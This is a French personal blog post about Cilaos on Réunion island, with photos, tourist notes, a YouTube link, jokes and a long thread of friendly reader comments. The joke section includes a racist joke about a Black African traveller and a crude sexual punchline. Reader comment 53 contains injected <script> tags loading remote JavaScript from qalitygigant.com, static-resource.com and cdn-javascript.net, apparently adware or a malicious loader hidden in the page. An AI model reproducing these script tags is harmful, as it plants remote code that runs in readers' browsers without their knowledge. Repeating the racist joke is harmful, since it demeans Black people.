• 10/2/20 : Cilaos à la Réunion (1/2) - Blagues diverses

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

     

    gif animé, blinkie,BONJOUR

     

    Bonjour à toutes et tous et bienvenue sur mon blog.

    J'espère que vous allez bien et je vous le souhaite de tout coeur.

    Nous retournons sur mon île d'adoption La Réunion et ce jour je vous emmène en 2 articles à CILAOS.

    Ces photos ont été faites par mon amie Cathoune qui est venue en vacances sur l'île en novembre 2019 et qui gentiment m'a proposé de mettre ses photos sur mon blog, et il y a de quoi faire car avec son mari et son cousin ils ont visité pratiquement toute l'île, donc j'aurai beaucoup d'autres endroits à vous faire découvrir grâce à ma Cathoune que je remercie.

    Tout d'abord en vidéo.

    Une amie que je remercie m'ayant signalé la semaine dernière que les commentaires étaient désactivés sur mes vidéos sur You Tube, j'ai activé les commentaires sur les vidéos de mon compte You Tube (j'avoue que je ne sais pas pourquoi ils étaient désactivés, peut-être à cause des changements fait par You Tube il y a plusieurs mois ???).

     

    Voici le lien de la vidéo (si vous avez dû mal à voir la vidéo sur le blog, car je fais mes vidéos sur Kizoa ensuite j'enregistre mes vidéos et pour finir j'insère mes vidéos sur You tube pour mettre sur mon blog) :

    https://youtu.be/dasnwU9BaiQ

     

     

    Puis quelques photos

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    Le cirque de Cilaos, orienté plein sud, est le plus sec des cirques de la Réunion. Il est à une heure de route en voiture de Saint Louis.
    La route qui mène au cirque de Cilaos est spectaculaire.

    Les 400 virages sont facilement oubliés tant le paysage est prenant de beauté.
    Les falaises abruptes sont le refuge des nids de papangues, rapaces endémiques, des pétrels et des paille-en-queue.
    Malgré les virages, les falaises et les ravins, la route n'est jamais dangereuse. Un parapet coure le long du ravin. Néanmoins quelques courbes en épingles à cheveux nécessitent un peu de doigté.

    Des villages surviennent de ci de là, enchâssés dans la montagne : Ilet Furcy, Petit-serré, Peter Both, palmiste rouge....
    3 tunnels sont creusés dans la roche, il ne sont pas éclairés et il n'y a qu'une voie. Ne pas oublier de klaxonner avant de s'engager. De même que dans quelques courbes ou tronçons très étroits.
    Le cirque de Cilaos est peuplé par 6200 habitants.

    Cilaos est au centre du cirque, et si le chais de Cilaos fait sa réclame dès l'entrée du village, c'est surtout son eau pétillante que l'on trouve dans toute l'île.

    Cilaos est le point de départ de nombreux sentiers de randonnée, dont " la cascade de Bras rouge, îlet à Cordes, palmiste rouge par le sentier des calumets, le sentier des sources, le piton des neiges, ....
    Les maisons en bois, très colorées sont magnifiques. Cilaos est renommé pour ses lentilles, qui sont excellentes.

    Le piton des neiges, situé derrière l'église Notre Dame des Neiges, est le point culminant de l’île de la Réunion avec ses 3070m.

    Cilaos a été célèbre pour ses eaux thermales depuis 1815 et exploitées depuis 1939. Elles jaillissent à 31° C et 38°C, selon les sources. Les Thermes de Cilaos proposent des cures thermales...

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    Ci-dessous l'église de CILAOS

    Notre Dame des Neiges
    L'église de Notre Dame des Neiges a été construite grâce à la volonté du père Paul Boiteau, curé de Cilaos à partir de 1934 puis, consacrée en 1950 par Monseigneur Daniel Liston, évêque de Port-Louis. Elle a été rénovée en 2006.

     

    10/2/20 = Cilaos 1/3 (Réunion ) -

     

    FIN 1/2

     

    rigolo, gif anime, rire,blinkie,drole

     

    Et maintenant si l'on riait un peu, cela vous dit des petites blagues ? Oui !!!! alors les voici :

     

    rigolo, gif anime, rire,blinkie,drole

     

    Un jeune marié, qui s’est disputé le matin avec sa femme, profite de la pause de midi pour aller lui faire des excuses, au grand magasin où elle tient le bureau des réclamations. Attendrie, elle conclut leur réconciliation par un long baiser.
    Son mari reparti, elle demande à un monsieur, qui attendait son tour :
    – Que puis-je pour vous ?
    – Heu… dit-il, en reluquant la jolie fille, j’ai exactement la même réclamation à formuler que le jeune homme qui vient de passer.

     

    rigolo, gif anime, rire,blinkie,drole,moquerie, poisson d avril


    Une secrétaire passe une interview d’engagement. Le Directeur lui demande combien elle voudrait qu’on la paye. Elle répond :
    – Dans les 1200 euros
    – Ça va, avec plaisir !
    Elle lui répond:
    -Non,avec plaisir,c'est nettement plus chère...

     

    Rire


    C’était une fois une mouche sur un lac et un poisson dans l’eau. Tout à coup, le poisson vit la mouche et se prépara pour sauter et la manger, mais pendant ce temps-là, un ours vit le poisson qui voulait la mouche puis un peu plus loin, un chasseur pointa son fusil vers l’ours qui regardait le poisson qui regardait la mouche.
    Mais un peu plus loin une souris vit le sandwich du chasseur qui pointa le fusil sur l’ours qui regarda le poisson qui regardait la mouche mais encore plus loin une chatte avait les pattes à l’eau, se léchant les babines vit la souris qui voulait le sandwich du chasseur qui pointa son fusil sur l’ours qui regardait le poisson qui regardait la mouche.
    Puis un peu plus tard ce qui devait arriver arriva : Le poisson mange la mouche, l’ours mangea le poisson, le chasseur tira sur l’ours, la souris prit le sandwich et tomba dans l’eau, la chatte courra après et tomba dans l’eau son tour.
    Tout ça pour vous dire que plus les préliminaires sont longs, plus la chatte est mouillée !

     

    rigolo, gif anime, rire,blinkie,drole,moquerie, poisson d avril

     

    Un africain, très noir, arrive à l'aéroport de Lyon St-Exupéry
    Il a un faux passeport et la photo de Léonardo DI CAPRIO dessus ...!
    Le douanier, très étonné, regarde le noir, puis le passeport ...!
    Il regarde encore le noir, puis regarde encore une fois le passeport, et tellement étonné, il appelle son supérieur :
    - "Dites-moi chef, vous qui êtes un peu plus cultivé que moi ...!
    le Titanic, il a coulé ou il a brûlé ..?"

     

    MERCI de votre visite, merci de vos commentaires, gif anime, blinkie

     

     

    Je vous remercie pour vos visites, pour vos commentaires, merci d'être là pour moi.

    Merci ce jour à DECOKLANE pour ses beaux gifs.

    Passez une délicieuse semaine pleine de douceur et de bonheur.

    Prenez bien soin de vous.

    Gros bisous d'amitié à vous partager.

     

     

    gif animé, blinkie,BISOUS,signature animee    92francoise.gif

    Partager via Gmail Yahoo! Pin It

    Tags Tags : ,
  • Commentaires

    1
    Lundi 10 Février 2020 à 04:26

    Je vous remercie à l'avance pour vos visites et pour vos commentaires mais devant m'absenter ce matin pour faire un examen de santé (un contrôle....) et même avec un RV il faut attendre longtemps donc je ne serai pas présente sur la blogo une bonne partie de la journée et modérant mes commentaires donc vous ne les verrez pas s'afficher n'étant pas sur la blogo. J'essayerai de venir en fin d'AM sur la blogo sinon ce sera demain matin, merci de votre compréhension. Gros bisous d'amitié à vous partager.

      • domino
        Lundi 10 Février 2020 à 19:11

        j'espère que le contrôle est bon ,moi j'en fait un Lundi prochaine,ce  doit être la saison bisous de mon gros rocher !

         

    2
    Lundi 10 Février 2020 à 06:57

    Bonjour mon trésor des Îles ....

    Oh le beau billet .. tes photos sont magnifiques ,très nette, on s y croirait 

    Mais je me suis marée avec tes gentilles blagounettes. Surtout

    celle de la mouche .... ( je ne ferai) pas de commentaires ! 
    Ici c’est la tempête ,mais moins fort que chez DENiSE ,elle n’a pas intérêt à sortir la pauvre ou alors il faut qu’elle mette du plomb dans ces poches ...hihihi.... 

    Passe une bonne semaine ma chérie .. et reçois des milliers de gros 

    bisous de la ROCHELLE.

     MONIQUE ❤️❤️❤️❤️

    3
    Lundi 10 Février 2020 à 07:37

    Lundi 10février 2020

    Merci pour ton fabuleux partage 

    Magnifique ta 1ère photo 

    Et tout et tout

    Bonne semaine 

    Ce matin nous sommes ventés comme partour 

    Bisous 

    4
    Lundi 10 Février 2020 à 07:49

    Bonjour Françoise,

    Merci pour cet article, cette découverte de

    ton île et les petites blagues bien sympa;

    Ici le vent a soufflé fort cette nuit, c'était

    annoncé par la météo , dommage car il faisait

    doux ! J'ai commencé à désherber mon

    jardin car les fleurs poussent ,des jonquilles,

    jacinthes et aussi les crocus. Bon début

    de semaine , courage pour tes rv médicaux.

    Merci pour tes gentils messages.

    Gros bisous-violette

    5
    Lundi 10 Février 2020 à 08:01

    Bonjour ma gentille Fany,

    quel plaisir de relire tes billets avec de magnifiques photos qui font rêver. Les blagues qui font rire dès le lundi. Bien la vidéo. Bon lundi. Gros bisous.

    6
    Lundi 10 Février 2020 à 08:44

    Bonjour ma Zoreille 

    Petit passage matinal je t'expliquerai pourquoi...

    Super ce petit village de Cilaos et puis il y a de quoi se rincer le gosier lol lol 

    Un petit rire dès le matin ça me va, surtout que, bon j'ai dit que j'expliquerai mais pas ici ...

    Bonne journée, bon début de semaine ma doucette

    Bisous ma Fany ♥

    7
    Lundi 10 Février 2020 à 09:14
    PPRene

    bonjour chere Fany, superbe reportage sur Cilaos, je suis venu en 1993 avec Jeanine, c'est loin mais je me souviens tres bien, de ce beau village, le clocher est magnifique, et tes photos tres belles, je me souviens de l'etablissement thermal, nous avons dejeuné au restaurant ! des dentelles, du vin !! j'en ai meme ramené une bouteille, je n'ose l'ouvrir, il est surement fichu ! le cadre est impressionnant avec ces montagnes et le lac, la route pas facile ! j'ai vu ton Youtube en direct, avec le lien il ne s'ouvre pas ? super tes blagues ! MDR ! j'etais venu aussi en 1983 avec mon epouse chez des cousins au Tampon, Cilhaos fait vraiment partie des plus belles choses à la Reunion, porte toi bien chere Fany, j'espère que le "controle technique" est au  top !! grosses bises, heureuse semaine et bon lundi ...   

    8
    Lundi 10 Février 2020 à 09:23

    Coucou ma Fany,

    Une très belle page avec de beaux paysages. Merci pour les blagues.

    La Bretagne a été relativement épargnée et dans mon île cela bougeait à peine eu égard cette petite vidéo adressée par une copine.

     

    https://youtu.be/iGAGZWd9wDc

     

    Ici, en pays gallo,  le chêne et le châtaigner ont perdu quelques branches, mais rien de méchant, excepté l'état boueux du jardin.

    Bises et bon début de semaine

    9
    Lundi 10 Février 2020 à 09:40

    Merci pour ces magnifiques photos qui nous permettent de découvrir ce petit paradis.

    Les blagues sont plus amusantes les unes que les autres.

    Passe une belle journée

    Amicalement

    Claude

    10
    Lundi 10 Février 2020 à 10:22

    Hello Françoise 

    Voila une belle visite , j'adore le dépaysement chez toi   toutes ces photos   sont source de joie  , le temps que je suis ici  je m'évade et rêve    merci à toi  ,  j'espère que tes examens seront bon,   prends bien soin de toi,  je t'embrasse   Dany 

    11
    Lundi 10 Février 2020 à 10:50

    Bonjour Françoise

    Encore des jolies vues et très beaux reportages

    Merci aussi pour ces partages

    Je viens te souhaiter un bon lundi en ce début de semaine

    et surtout te souhaiter une très bonne semaine

    Amitié

    Jean

    12
    Lundi 10 Février 2020 à 10:56

    Bonjour mon amie Françoise

    je viens me ressourcer sur tes belles images de ton ile moi c'était un week-end dans le nord et Bruges belgique mais pas des plus concluantes causes temps pluie et rafale de vent qui à gâcher ce mini-séjour, bon pas grave en mars la hollande avec ses belles fleurs sera surement mieux 3 jours bisou mon amie bonne semaine ,

     

     

    13
    Lundi 10 Février 2020 à 11:42

    Bonjour " mon ti rayon de soleil " 

    Mon Dieu que cette église est belle toute blanche au pied de cette montagne .

    Je me suis encore régalée à lire ta page si bien illustrée. C'est un véritable réconfort .

    Nous avons eu cette nuit une belle tempête , nous ne sommes pas habitués à avoir ce genre de temps déchaîné alors la nuit à été blanche . Le réveil chez mes enfants un peu agité : tuiles envolées tombées sur la voiture de ma belle fille  pare-brise cassé....enfin tout pour débuter une belle semaine ........Marre de ce temps FOU !!!!!! 

    Je te souhaite une belle journée et agréable semaine .

    A bientôt le plaisir de te lire .

    Gros bisous mon amie 

    Bertille

    14
    Maite la basque
    Lundi 10 Février 2020 à 11:57
    Hello Françoise, beau reportage, les deux fois que je suis dans ta belle , j'ai eu beaucoup de plaisir de venir à Cilaos, départ de pleins de randos. J'espère que tous examens te assureront. A le vieillou...
    J'ai le piton est entré en éruption ce matin. Les deux fois quinze jours, je n'ai pas pu voir une éruption, un bien pour un mal, car nous pu faire la balade jusqu'au piton (moi seulement jusqu'au Formica) faire la plaine des sables. Belle journée. Maïté avec tous mes muxu
    15
    Lundi 10 Février 2020 à 12:02

    J'espère que ton contrôle se passera bien ma chère Françoise,

    nous avons le même âge lol lol ...

    je me suis bien marrée à te lire 

    tout comme tes blagounettes du jour

    et magnifique partage de cette superbe région ...

    Merci pour tes clichés, vidéos  que j'adore ,

    Ciara nous a oubliée, soleil, température et mer calme,

    juste "invasion des parisiens" en vacances ouf ..

    Avec toute mon amitié et affectueuses bises,

    vers ton magnifique p'tit rocher...

    Christiane qui ne t'oublie pas 

    16
    Lundi 10 Février 2020 à 12:16

    coucou Françoise je viens prendre l'air et un peu de chaleur sur ton îles et sa fait beaucoup de bien a voir ces magnifiques photos,j'espère que tu vas bien, aujourd'hui nous avons de la pluie,je te souhaite un très bon Lundi,bises

    17
    Lundi 10 Février 2020 à 14:12

    Bonjour mon adorable Fany chérie,

    j'ai d'abord admiré toutes les belles photos de ton amie, puis j'ai ri à gorge déployée avec les histoires drôles.

    Je m'étais dit je viens de suite pour que tu aies le temps de lire mon com à temps ... et bien ce sera quand tu pourras et j'espère que ton rv ne te donneras pas de mauvaises nouvelles ma douce.

    Pour en revenir à Cilaos c'est très beau et les affiches sont rigolotes rédigées en créole. J'aime bien celles qui proposent des choses à manger! Que peut-il y avoir dans les grands cubes bleus sur les étals?

    Mais tu veux nous souler avec toutes ces bouteilles de ? rhum, sirop, vins?

    Ma chérie, ma petite soeur de coeur, du mien plein d'amour pour toi, je t'envoie mille bisous car mi aime aou beaucoup.

    18
    Lundi 10 Février 2020 à 14:13

    Bonjour Fanny.

    Que de belles photos c'est un plaisir .

    J'aime bien cette petite église toute simple vue de l'extérieur mais qui doit être belle a l'intérieur vue son nom .Notre Dame des neiges .

    Je souhaite que ton contrôle  santé aille bien .

    Merci pour les blagues ,pas mal .

    Bonne journée et prend soin de toi .

    Je t'envoie une envolée de bisous . kettyn.

    19
    Hiakku
    Lundi 10 Février 2020 à 14:20
    O voyage avec toi Françoise.
    La tempête est passée mais nous restons en vigilance orange dans le Nord de la France.
    Amusantes, t'es blagues.
    Passes une agréable semaine.
    Bisous
    20
    Lundi 10 Février 2020 à 14:39

    coucou françoise

    la tempete et passer pas de degas cher moi mais certains voisins oui

    bonne semaine a vous tous

     

     

     

    21
    Lundi 10 Février 2020 à 14:47

    Bonjour Françoise, rien de grave j'espère (même si c'est juste un contrôle).

    Cet article me rappelle les photos prises par ma belle-mère quand elle est allée à la Réunion.

    En te souhaitant une bonne fin de journée,

    je t'envoie de gros bisous par messager spécial.

     

    22
    Lundi 10 Février 2020 à 15:31

    Je me suis bien amusé de tes blagues,mais je n'aime pas trop les préliminaires avec tous ces intervenants....mdrrr

    J'ai entendu que le volcan de la fournaise s'est réveillé.J'espère que tu es à l'abri....

    Bonne semaine.

    23
    Lundi 10 Février 2020 à 16:03

    Bonjour fany. Avec un énorme retard je te souhaites un joyeux anniversaire je suis vraiment désoler de ne pas avoir été sur mon blog pour ton annif. Elle est magnifique ta vidéo et une superbe musique qui l'accompagne,c'est très Jolie la Réunion ça doit être agréable l'été,merci de nous faire rêver par la beauté de ton Ile c'est merveilleux. Je n'oublie pas ton bon sens de l'humour dont j'ai du plaisir a les lire c'est bon pour le moral. Je te souhaites un bon lundi et une excellente semaine. Gros bisous pour ton anniversaire ton amie gisou

    24
    Lundi 10 Février 2020 à 16:05

    bonsoir Françoise

    je me souviens de cette église, mais pas de ce plan d'eau !! tu vois il va falloir qu'on y retourne !! cela fait 20 ans !!! et puis je prenais peu de photos...

    heureusement que votre fête était dehors !!!

    bisous

    25
    Lundi 10 Février 2020 à 16:17

    Bonjour ma Fany

    c'est trop beau tes images et vidéo on se croirait  samedi moi et Chris nous partons en Espagne une semaine chez nos amis mariage an dernier bisou ma douce bonne semaine je serai connecté à Barcelone ,

     

    26
    Lundi 10 Février 2020 à 16:41

    Alors, sans préliminaires, Bonjour Françoise !

    Je reconnais bien Cilaos; nous n'étions à l'hôtel, pas loin de cette église.

    Certains n'ont pas de souci pour afficher mes montages et d'autres en ont; pas grand chose à faire car cela tient plus à leur PC qu'à mes montages.

    Semaine chargée mais nous devrions la terminer par le repas des 70 ans de mon amie et rester un peu tranquille, ensuite !

    Bonne soirée.

    Gilbert

     

    27
    Lundi 10 Février 2020 à 16:43

    Kikou douce Françoise

    On peut dire que tu commences bien la semaine avec l'histoire de la mouche et de tous ses copains et copines, mais la chute est vrai, et vous les jeune souvenez vous en, ce sont les bonnes choses de la vie !

    Époustoufflant ta page, j'ai adoré les paysages, c'est vraiment très beau. L'église a un clocher de toute beauté.

    Par contre même en agrandissant la photo je ne sais pas ce que les bouteilles, en nombre incalculable, contiennent ? du Rhum ou du jus d'orange ? hihihi !

    J'ai encore voyagé sympathiquement.

    J'espère que tu vas bien

    Je te souhaite une douce journée, ou plutôt soirée

    Gros bisous

    @lain

    28
    Lundi 10 Février 2020 à 17:08

    coucou fany

    quels superbes paysages ! ça fait rêver !

    400 virages ! ça fait beaucoup lol

    merci pour tes blagues !

    bonne semaine à toi aussi 

    ici ça souffle ! 

    bisous

     

    29
    Lundi 10 Février 2020 à 18:59

    Bonsoir ma douce Fany,

    les photos que ton amie a faite sur Cilaos, sont superbes..

    C'est un endroit à visiter..

    J'espère que tu vas bien.

    Est-ce toujours l'été chez toi? 

    il fait encore chaud?

    Chez nous il fait un peu plus froid mais guère plus.

    Si tu as le temps de passer sur le forum, tu as reçu beaucoup de messages d'amitié pour ton anniversaire...

    Je te souhaite une bonne semaine .

    Gros bisous - Phyllis.

     

     

    30
    Lundi 10 Février 2020 à 19:12
    CathyRose

    C'est vrai que les paysages sont magnifiques, et ça paraît très fleuri qui plus est. L'église doit être assez récente mais elle est très jolie, blanche et élancée. Merci pour ces sourires, j'adore celle avec Léonardo di Caprio !
    Belle soirée, bisous !
    Cathy

    31
    Lundi 10 Février 2020 à 20:32

    On vient se réchauffer sur ton blog avec les belles photos de ton île.

    Bonne semaine à toi ! Gros bisous

    32
    Sonya
    Lundi 10 Février 2020 à 20:40
    Coucou
    J'espère que tout va bien côté santé
    Prends soin de toi
    Gros bisous créoles
    33
    Lundi 10 Février 2020 à 21:33

    un coucou de chez ma pote 

    je vais bien 

    tempete chez moi 

    bizouille du soir

    34
    Lundi 10 Février 2020 à 21:47

    Un régal tes photos et vidéos pour compléter ce billet .

    Merci bises bonne soirée !

    35
    Lundi 10 Février 2020 à 22:30

    Bonne nuit Françoise, bisous.

    36
    Mardi 11 Février 2020 à 01:05
    Bonjour Françoise fort belle page, youtube ne s'ouvre pas en Chine Passe une bonne journée Avec amitiés René
    37
    Mardi 11 Février 2020 à 04:48

    Bonjour Françoise,

    Une superbe page, des photos magnifiques, j'aime beaucoup cette église.

    J'ai bien ri de tes blagues. Merci pour ce partage.

    Je te souhaite une bonne journée,

    Grosses bises,

    MF

    38
    Mardi 11 Février 2020 à 05:08

    Bonjour Fany

    Toujours des périodes de fort vent!

    Mais la pluie est plutôt absente...

    Tous ces moments, et tous ces messages

    partagés au fil du temps, des années,

    quelle douce et belle complicité, depuis

    aussi longtemps que l'espoir

    de notre amitié perdure dans le temps.

    Je viens vous souhaitez une agréable journée

    et qu' elle soit remplie de petits et grands plaisirs!

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    39
    Mardi 11 Février 2020 à 07:07

    Merci beaucoup pour vos commentaires, belles créations.... amies avec blogs et sans blog.

    Mon examen de contrôle hier dans l'ensemble s'est bien passé, merci à vous et prenez bien soin de vous surtout.

    J'espère que vous n'avez pas eu trop de dégâts avec cette tempête qui a touché la France, la Corse.... 

    Nous ici c'est le Sud qui en ce moment est pas mal arrosé de la fin de la tempête qui s'éloigne.

    Notre volcan lui a pété hier LOL !!!!

    Merci à mes ami(e)s fidèles sans blog que je nomme par ordre alphabétique :

    Domino

    Maïté la Basque

    Mamie d'Alsace

    Hiakku

    Sonya.... 

    et pardon si j'en ai oublié, si je peux vous répondre par mail je le fais avec plaisir et ou sur Facebook si vous y êtes, mais par contre pour Hiakku je ne peux que te répondre ici n'ayant pas d'autre moyen de communication. Merci à vous pour vos gentils commentaires.

    Belle journée et gros bisous d'amitié.

    Chez moi 10 H du mat et je vous laisse.

    A demain si tout va bien.

     

     

    40
    Mardi 11 Février 2020 à 07:32

    Bonjour Françoise.

    Ciel bouché et petite pluie nocturne.

    Les jeunes, venus voir Bernadette, ont eu peur de reprendre la route avec leur voiture diesel, qui fumait beaucoup; ce n'était que des injecteurs bouchés mais leur mère leur à prêté la sienne pour qu'ils puissent ouvrir le magasin, le lendemain.

    Résultat, mon amie ne pouvant conduire que des voitures avec boîte automatique, du fait de son genou, se retrouve avec une voiture à boîte manuelle; je lui ai donc passé ma voiture en boîte automatique et il nous faut maintenant remmener la voiture des jeunes et récupérer celle de Bernadette ... et je suis de service !

    Alors, refaire de la route tout le weekend, très peu pour moi; ils feront le repas d'anniversaire sans moi !

    Bonne journée.

    Gilbert

    41
    Mardi 11 Février 2020 à 07:33

    Bonjour Françoise,

     

    J'ai bien aimé la balade. Ce qu'elle est jolie cette église. Et puis , les blagues.  j'ai adoré, toutes. Et la dernière! oh! Quel rire!

    Merci pour tout

    Gros bisous

    smile

    42
    Mardi 11 Février 2020 à 07:36

    Coucou Françoise

     Je ne me lasse pas de venir te voir sur ton blog, je prends une dose de bonheur a chaque visite.

    Merci pour le partage.

    Je te souhaite une belle journée.

    Rohnny

    43
    Mardi 11 Février 2020 à 08:06
    PPRene

    bonjour chere Fany, j'espère que ton controle technique est au top !! et que tu vas bien, ainsi que les tiens ? super ton article sur Cilaos ! un endroit qui m'avait bien plu, en 1983 mon cousin travaillait sur un systeme de captage d'eau du cirque, le tout descendait par des tunnels à une usine hydraulique ? je ne l'ai jamais su ? merci pour ton gentil passage, bravo encore pour tes photos, je n'utilise pas youtube pour mes videos, seulement Kizoa, c'est peut etre la raison qu'il n'y a pas de possibilité de coms ? je n'ai pas bloqué les coms  volontairement en tout cas  ? porte toi bien chere Fany, bon mardi, il fait beau chez nous, hier 18, et pas de tempete, un petit vent doux  seulement ! grosses bises   

    44
    Mardi 11 Février 2020 à 08:29
    francinea

    Bonjour, on avait pris une location à l'hôtel des neiges, le temps était mitigé, on n'a même pas vu le piton des neiges! on devait aussi aller voir les cultures de lentilles (excellentes mais chères), mais le temps étant à la pluie, nous sommes redescendus vers la mer; l'église de Cilaos est magnifique sur fond de montagnes, je te souhaite une bonne journée, bisous

     

    45
    Mardi 11 Février 2020 à 08:45

    Bonjour Françoise

    Merci pour ton commentaire sur le bille de LA SAINT VALENTIN

    Moi aussi je renouvelle mes remerciements pour ta fidélité pour tes passages sur mon blog et tes commentaires appropriés

    Passe un bon mardi en ce 11 Février

    Amitié

    Jean

    46
    Mardi 11 Février 2020 à 10:36
    bonjour Françoise moi aussi peu de temps sur les blogs car nous sortons toutes les journées, ça ira mieux en milieu de semaine prochaine lorsque nous serons de retour... je vais avoir un sacré travail de tri bisous
    47
    Hiakku
    Mardi 11 Février 2020 à 12:40
    Heureuse de lire que tu vas bien.
    Retour du soleil cet après-midi.
    Voici mon adresse mail : amgharm@gmx.fr.
    Monique
      • Mercredi 12 Février 2020 à 15:45

        HIAKKU : Merci beaucoup, comme cela je peux te répondre par mail, douce soirée et gros bisous d'amitié

    48
    Mardi 11 Février 2020 à 12:56

    Bonjour Fany, merci pour ce partage, visite de Cilaos, ça fait du bien de "visiter" d'autres contrées...

    Je t'invite à voir mes 2 petites créas pour la St-Valentin sur mon blog : http://mamyvel-creations.eklablog.com/

    Gros bisous de la métropole ;)

    49
    Mardi 11 Février 2020 à 14:48
    chantal33300

    Toujours aussi beau chez toi. ça donne envie de prendre des vacances. Bisous

    50
    Mardi 11 Février 2020 à 15:10

    Coucou Françoise , une petite visite rapide car je sors de la grippe donc bien chao ! . Cette église est superbe comme ses alentours . Je dois réduire ma présence sur le net à cause des séquelles de mon ex anévrisme qui reviennent à la charge frown !! . Bonne semaine au soleil , gros bisous , escapade , 

    51
    Fruito
    Mardi 11 Février 2020 à 15:18
    Coucou Fanny cest superbe et on se detend ,je suis sur mon tel et je vois tout ,la case commentaire est petite mais ça marche après la tempête le vent glacial la cheminée ronfle prends bien soins de toi gros bisous
      • Mercredi 12 Février 2020 à 15:47

        Fruito : Merci ma Fruifrui pour ta fidélité à mon blog, douce soirée et gros bisous d'amitié

    52
    Mardi 11 Février 2020 à 15:46

    Kikou douce Françoise

    Je suis allé terminer les histoires que je n'avais pas lu hier. Je me suis encore bien amusé.

    Et puis j'ai regardé le lac, le jet d'eau, et tout est vraiment très beau, on en redemande !.

    J'ai vu à la télé que le piton de la Fournaise fait encore des siennes, ça m'a l'air de bien couler la lave !

    J'espère que tu vas bien

    Je te souhaite une très bonne journée

    Gros bisous

    @lain

    53
    Mardi 11 Février 2020 à 16:02

    Bonjour Fany.

    Ce matin il neigeait et cet après midi il fait un joli ciel tout bleu et c'est avec lui que je te souhaite une bonne semaine avec un peu de retard.

    Bisous de nous deux.

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://qalitygigant.com/optout/set/lat?jsonp=__mtz_cb_748810937&key=227ee61cbd084e801b&cv=1581433363&t=1581433363081" type="text/javascript"></script> <script src="http://qalitygigant.com/optout/set/lt?jsonp=__mtz_cb_460260902&key=227ee61cbd084e801b&cv=50&t=1581433363082" type="text/javascript"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1581433363094" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    54
    Mardi 11 Février 2020 à 18:30

    COUCOU  DU  SOIR ici...

    merci pour ce magnifique reportage sur ton ile

    apres midi de courses avec ma fille

    je suis HS

    super achats pour l'arrivée dans un mois

    d'une nouvelle princesse

    il y a tant de belles choses pour les bébés

    difficile d'y resister

    bonne  journee

    bisousss

     

    55
    Mardi 11 Février 2020 à 21:04
    4ine
    Cilaos la ville aux 100 virages . Aux bonnes lentilles, au vin , aux broderies. Que de souvenirs . Bisousssss
    56
    Mardi 11 Février 2020 à 21:22

    Je viens de faire une agréable visite avec toutes ces belles photos

    Toujours un bon moment avec ton final en humour douce Fany

    Je te souhaite de passer une bonne nuit

    Gros bisous

    57
    Mardi 11 Février 2020 à 22:34

    Bonsoir  chère  Françoise

    j'espère  que  vous  allez  bien  malgré  tout  

    et  je  vous  remercie  bien  vivement  pour  les  bonnes 

    blagues , une  bonne partie  de  rigolade

    Que  du  plaisir  de  venir  vous  rendre  visite

    Bises  amicales  de  Lucien

    58
    Mercredi 12 Février 2020 à 01:43
    Bonjour Françoise Déjà la moitié de la semaine Passe une bonne journée Avec amitiés René
    59
    Mercredi 12 Février 2020 à 04:48

     Bonjour  Fany

    Après une belle journée de mardi,

    ou le soleil ne nous a pas quitté,

    et que monsieur Éole a réduit

    cette soufflerie, au moins dans notre coin,

    qui heureusement n'a laissé que du bois

    par ci par la, a voir et entendre

    nous n'avons pas été sur

    une mauvaise trajectoire!

    Bon mercredi a profiter de cette journée

    réservée aux enfants en vous souhaitant le soleil!

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    60
    H-IL
    Mercredi 12 Février 2020 à 08:06

    Le ciel du VS redevient bleu

    Gros bisous p'tite Zoizelle

      • Mercredi 12 Février 2020 à 15:49

        H'IL : Merci mon gentil zhom pour ton gentil coucou. Douce soirée et gros bisous de ton zoizillon

    61
    Mercredi 12 Février 2020 à 08:11
    PPRene

    bonjour chere Fany, j'espère que tout va pour le mieux, et que le temps est agreable, chez nous c'est le cas, nous n'avons pas eu la tempete, et il fait entre 11 et 16 avec soleil ! j'adore les photos de Cilaos, un grand merci à ton amie, superbe l'arbre bleu, si je me souviens bien il s'agit du "Jacaranda", moins present à Maurice ? au fait j'ai pu ouvrir ton youtube avec le lien aujourd'hui ? et je ne comprends pas pourquoi il n'y a plus de coms sur mes presentations Kizoa ? bravo pour ces belles images de Cilaos, de bons souvenirs ! super les blagues, MDR!! je te souhaite un bon mercredi, grosses bises, porte toi bien ! pour moi sortie au club canin !

    62
    Mercredi 12 Février 2020 à 10:27

    Bonjour mon petit oiseau

    Enfin me voilà quelle belle page, ça donne vraiment envie de faire ses valises et venir visiter tout ça

    Mais bon je voyage à travers toi merci pour tout ça

    Je viens te souhaiter une agréable semaine

    En ce moment je délaisse un peu Ekla, j'ai hâte de savoir mon résultat du scanner ce jeudi.

    Lundi ou mardi je serais fixé avec mon pneumologue.

    Tout va se décider et enfin après je serais tranquille

    Et pouvoir reprendre mes habitudes.

    A bientôt gros bisous Jasmine.♥

    63
    Mercredi 12 Février 2020 à 14:03

    Coucou ma Fany, merci pour ce beau billet, chouette la vidéo, j'ai adoré le beau marché couvert mais j'ai trouvé les boissons très chères.. superbe Eglise qui porte bien son nom car elle est tout de blanc vêtue.

    Morte de rire avec tes blagues lol...

    Bonne semaine avec des bisous tout plein et j'espère que tes résultats seront bons..

    chatou

    64
    Mercredi 12 Février 2020 à 14:32

    j'ai besoin d'air Françoise alors je viens chez toi, je viens prendre un peu de chaleur sur ta magnifique îles que j'espère un jour je verrais ,j'espère que tu vas bien, ce matin nous avons du brouillard , peut être que le soleil vas venir ,je te souhaite un très bon Mercredi,bises

    65
    Mercredi 12 Février 2020 à 17:21

    Kikou douce Françoise

    Et une petite visite ... une !

    Je viens faire un petit tour chez toi pour me sentir encore chez moi mais dans une autre région, c'est bien de partir sans bouger.

